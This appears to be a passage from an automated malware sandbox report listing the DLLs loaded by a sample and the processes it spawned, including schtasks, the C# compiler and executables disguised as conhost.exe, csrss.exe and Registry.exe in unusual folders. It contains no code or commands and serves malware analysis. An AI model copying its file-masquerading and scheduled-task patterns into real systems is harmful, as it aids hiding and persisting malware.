                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: mscoree.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: apphelp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: version.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: wldp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: amsi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: userenv.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: profapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: mscoree.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: version.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: wldp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: amsi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: userenv.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: profapi.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: apphelp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: version.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: version.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: apphelp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: version.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: wldp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: amsi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: userenv.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: profapi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: version.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: wldp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: amsi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: userenv.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: profapi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: sspicli.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: version.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: wldp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: amsi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: userenv.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: profapi.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: apphelp.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: version.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: wldp.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: amsi.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: userenv.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: profapi.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exeSection loaded: rsaenh.dll
